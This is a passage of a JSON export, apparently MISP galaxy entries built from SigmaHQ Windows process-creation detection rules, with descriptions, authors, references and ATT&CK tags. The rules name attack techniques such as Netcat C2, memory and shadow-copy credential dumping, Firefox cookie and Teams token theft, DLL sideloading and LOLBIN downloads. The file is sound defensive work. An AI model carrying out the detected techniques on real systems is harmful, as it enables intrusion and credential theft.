"windows", "refs": [ "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_kavremover_uncommon_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", "value": "Kavremover Dropped Binary LOLBIN Usage" }, { "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_netsupport_rat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0afbd410-de03-4078-8491-f132303cb67d", "value": "Renamed NetSupport RAT Execution" }, { "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2021-07-21", "falsepositive": [ "Legitimate ncat use" ], "filename": "proc_creation_win_pua_netcat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://www.revshells.com/", "https://nmap.org/ncat/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml" ], "tags": [ "attack.command-and-control", "attack.t1095" ] }, "related": [ { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "value": "PUA - Netcat Suspicious Execution" }, { "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", "meta": { "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "creation_date": "2020-03-04", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml" ], "tags": [ "attack.execution", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "value": "MMC20 Lateral Movement" }, { "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administrator or user executes a service for legitimate reasons." ], "filename": "proc_creation_win_net_start_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_start_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", "value": "Start Windows Service Via Net.EXE" }, { "description": "Shadow Copies creation using operating systems utilities, possible credential access", "meta": { "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate administrator working with shadow copies, access for backup purposes" ], "filename": "proc_creation_win_susp_shadow_copies_creation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1003.002", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "value": "Shadow Copies Creation Using Operating Systems Utilities" }, { "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", "value": "DLL Sideloading by VMware Xfer Utility" }, { "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", "meta": { "author": "frack113", "creation_date": "2022-04-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", "https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml" ], "tags": [ "attack.credential-access", "attack.t1539", "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", "value": "SQLite Firefox Profile Data DB Access" }, { "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_conhost_path_traversal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", "value": "Conhost.exe CommandLine Path Traversal" }, { "description": "Detects a renamed \"dctask64.exe\" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection, arbitrary command and process execution.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_dctask64.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1055.001", "attack.t1202", "attack.t1218" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", "value": "Renamed ZOHO Dctask64 Execution" }, { "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hwp_exploits.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://blog.alyac.co.kr/1901", "https://twitter.com/cyberwar_15/status/1187287262054076416", "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001", "attack.execution", "attack.t1203", "attack.t1059.003", "attack.g0032" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", "value": "Suspicious HWP Sub Processes" }, { "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", "meta": { "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-09-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive", "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/", "https://twitter.com/0gtweet/status/1299071304805560321?s=21", "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", "value": "Process Memory Dump via RdrLeakDiag.EXE" }, { "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-08", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_iox.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/EddieIvan01/iox", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_iox.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", "value": "PUA- IOX Tunneling Tool Execution" }, { "description": "Detects the execution of Xwizard tool from a non-default directory.\nWhen executed from a non-default directory, this utility can be abused in order to side load a custom version of \"xwizards.dll\".\n", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-09-20", "falsepositive": [ "Windows installed on non-C drive" ], "filename": "proc_creation_win_xwizard_execution_non_default_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xwizard_execution_non_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "value": "Xwizard.EXE Execution From Non-Default Location" }, { "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ldifde_export.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html", "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_export.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "4f7a6757-ff79-46db-9687-66501a02d9ec", "value": "Active Directory Structure Export Via Ldifde.EXE" }, { "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_add_safeboot.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "value": "Add SafeBoot Keys Via Reg Utility" }, { "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)\n", "meta": { "author": "frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_protocolhandler_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "value": "File Download Using ProtocolHandler.exe" }, { "description": "Detects execution of commands that leverage the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)", "creation_date": "2022-08-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt", "https://twitter.com/n1nj4sec/status/1421190238081277959", "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "value": "Mshtml.DLL RunHTMLApplication Suspicious Usage" }, { "description": "Detects a ping command that uses a hex encoded IP address", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-23", "falsepositive": [ "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "filename": "proc_creation_win_ping_hex_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/vysecurity/status/977198418354491392", "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.t1027" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "value": "Ping Hex IP" }, { "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file with a non-\".rsp\" extension.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_response_file_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d32dd6f-3196-4093-b9eb-1ad8ab088ca5", "value": "Suspicious Response File Execution Via Odbcconf.EXE" }, { "description": "Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sndvol_susp_child_processes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Max_Mal_/status/1661322732456353792", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml" ], "tags": [ "attack.execution" ] }, "uuid": "ba42babc-0666-4393-a4f7-ceaf5a69191e", "value": "Uncommon Child Processes Of SndVol.exe" }, { "description": "Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.\nThe database might contain authentication tokens and other sensitive information about the logged in accounts.\n", "meta": { "author": "@SerkinValery", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", "value": "Potentially Suspicious Command Targeting Teams Sensitive Files" }, { "description": "Detects usage of \"msedge_proxy.exe\" to download arbitrary files", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msedge_proxy_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e84d89c4-f544-41ca-a6af-4b92fd38b023", "value": "Arbitrary File Download Via MSEDGE_PROXY.EXE" }, { "description": "Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.\n", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5746143-59d6-4603-8d06-acbd60e166ee", "value": "Uncommon Child Process Of AddinUtil.EXE" }, { "description": "Detects the execution of \"lodctr.exe\" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-15", "falsepositive": [ "Legitimate usage by an administrator" ], "filename": "proc_creation_win_lodctr_performance_counter_tampering.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml" ], "tags": [ "attack.execution" ] }, "uuid": "cc9d3712-6310-4320-b2df-7cb408274d53", "value": "Rebuild Performance Counter Values Via Lodctr.EXE" }, { "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-06-28", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", "Legitimate administrator sets up autorun keys for legitimate reasons.", "Discord" ], "filename": "proc_creation_win_reg_add_run_key.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", "value": "Potential Persistence Attempt Via Run Keys Using Reg.EXE" }, { "description": "Detects execution of \"odbcconf\" with \"INSTALLDRIVER\" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Legitimate driver DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized." ], "filename": "proc_creation_win_odbcconf_driver_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3f5491e2-8db8-496b-9e95-1029fce852d4", "value": "Driver/DLL Installation Via Odbcconf.EXE" }, { "description": "Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities", "meta": { "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_rundll32_susp_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/eral4m/status/1479106975967240209", "https://twitter.com/Hexacorn/status/885258886428725250", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", "https://twitter.com/eral4m/status/1479080793003671557", "https://twitter.com/nas_bench/status/1433344116071583746", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", "value": "Potentially Suspicious Rundll32 Activity" }, { "description": "Detects an uncommon svchost parent process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_svchost_uncommon_parent_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ 